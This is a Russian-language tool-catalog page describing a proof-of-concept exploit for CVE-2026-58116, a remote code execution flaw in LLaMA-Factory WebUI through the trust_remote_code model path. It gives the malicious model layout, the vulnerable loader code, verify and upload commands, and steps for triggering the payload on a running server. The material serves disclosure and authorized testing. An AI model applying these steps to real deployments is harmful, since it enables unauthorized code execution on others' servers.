Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection — Эксплойт proof-of-concept для CVE-2026-58116, демонстрирующий удалённое выполнение кода в LLaMA-Factory WebUI через внедрение пути модели trust_remote_code. Включает модель с полезной нагрузкой и скрипт проверки для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийCTFСтатьи и ИсследованияОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHub
hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

Эксплойт proof-of-concept для CVE-2026-58116, демонстрирующий удалённое выполнение кода в LLaMA-Factory WebUI через внедрение пути модели trust_remote_code. Включает модель с полезной нагрузкой и скрипт проверки для авторизованного тестирования безопасности.

Репозиторий
163 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-58116 — RCE в WebUI LLaMA-Factory через trust_remote_code

Доказательство концепции для CVE-2026-58116 (CVSS 9.8 Critical): удалённое выполнение кода в LLaMA-Factory <= v0.9.5.

WebUI LLaMA-Factory жёстко задаёт trust_remote_code=True при загрузке модели (src/llamafactory/webui/chatter.py:139 и runner.py:175,320). Управляемое атакующим поле «Model path» без проверки попадает в AutoTokenizer.from_pretrained() / AutoModel.from_pretrained(), поэтому библиотека Hugging Face transformers загружает и выполняет произвольный Python-код из вредоносного репозитория модели.

⚠️ Только для образовательных целей

Этот PoC предназначен только для авторизованного тестирования безопасности и обучения. Прилагаемая полезная нагрузка намеренно безвредна (она выводит разведданные о хосте через id). Запускайте её только против систем, которыми вы владеете или на тестирование которых у вас есть разрешение. Никогда не разворачивайте вредоносную полезную нагрузку против инфраструктуры без явного разрешения.

Содержимое

.
├── poc-model/
│   ├── config.json          # declares auto_map → attacker modules
│   ├── configuration_poc.py # payload: runs os.system("id ...") at config load
│   ├── modeling_poc.py      # minimal stub model class
│   └── __init__.py          # makes it an importable package
└── build_and_verify.py      # assemble + verify the sink in isolation

Как работает sink

transformers создаёт экземпляр класса конфигурации до загрузки каких-либо весов, поэтому полезная нагрузка в PoCConfig.__init__ срабатывает, как только конфиг прочитан — веса существовать не должны. Именно этот путь LLaMA-Factory проходит через src/llamafactory/model/loader.py:

def _get_init_kwargs(model_args):
    return {"trust_remote_code": model_args.trust_remote_code, ...}   # True (hardcoded)

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)

Быстрый старт

Проверьте sink локально (WebUI не нужен — доказывает контракт, который WebUI нарушает):

pip install transformers torch
python3 build_and_verify.py

Ожидаемый вывод — обратите внимание, что баннер полезной нагрузки появляется во время загрузки конфига:

[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
  time      : 2026-07-02T...
  host      : gpu-host-01
  user      : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)

Полный цикл через запущенный WebUI LLaMA-Factory:

  1. Загрузите PoC-модель на Hub:
    huggingface-cli login
    python3 build_and_verify.py --upload your-user/llmfcty-poc
    
  2. Запустите затронутую панель LLaMA-Factory: llamafactory-cli webui
  3. Откройте вкладку Chat, укажите Model path как your-user/llmfcty-poc, нажмите Load Model.
  4. Полезная нагрузка выполняется на сервере в контексте процесса LLaMA-Factory.

Ссылки

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
  • Консультация VulnCheck: https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
  • Первоначальное раскрытие (h3nrrrych4u): https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8
Скачать инструмент